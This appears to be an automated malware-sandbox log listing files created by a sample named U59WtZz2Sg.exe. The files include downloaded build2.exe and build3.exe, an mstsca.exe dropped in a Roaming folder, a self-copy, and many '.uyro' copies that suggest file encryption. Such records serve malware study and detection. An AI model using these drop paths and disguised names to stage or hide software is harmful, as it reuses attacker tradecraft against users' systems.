Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vi\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quz-PE\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\te\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fi\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sw\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OfflineSetupProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\de\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-PT\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ProvProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kn\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sq\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\id\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-BD\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SysprepProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ne-NP\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cy-GB\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hy\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\CR_4BAC1.tmp\setup.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bs-Latn-BA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SmiProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ms\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nn-NO\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca-Es-VALENCIA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ka\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gd\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lt\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Application Data\Application Data\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mi-NZ\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ru\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OSProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\az-Latn-AZ\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tk-TM\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\TransmogProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nb-NO\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ky\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\km-KH\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mt-MT\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ro\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\tmpCDDA.tmp.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ml-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ta\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kok\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\be\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\is\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tg\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mn\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\tmpCDDA.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lb-LU\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SetupPlatformProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fil-PH\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\it\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tt\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tn-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\th\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\CR_4BAC1.tmp\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ga-IE\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\el\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\or-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zu-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\as-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\da\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ar\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ur\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\UnattendProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hi\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uz-Latn-UZ\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\es\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bg\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hu\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ug\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\et\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\prs-AF\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lv\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gu\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\af\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cs\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-GB\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fa\FileSync.LocalizedResources.dll.mui	Jump to dropped file
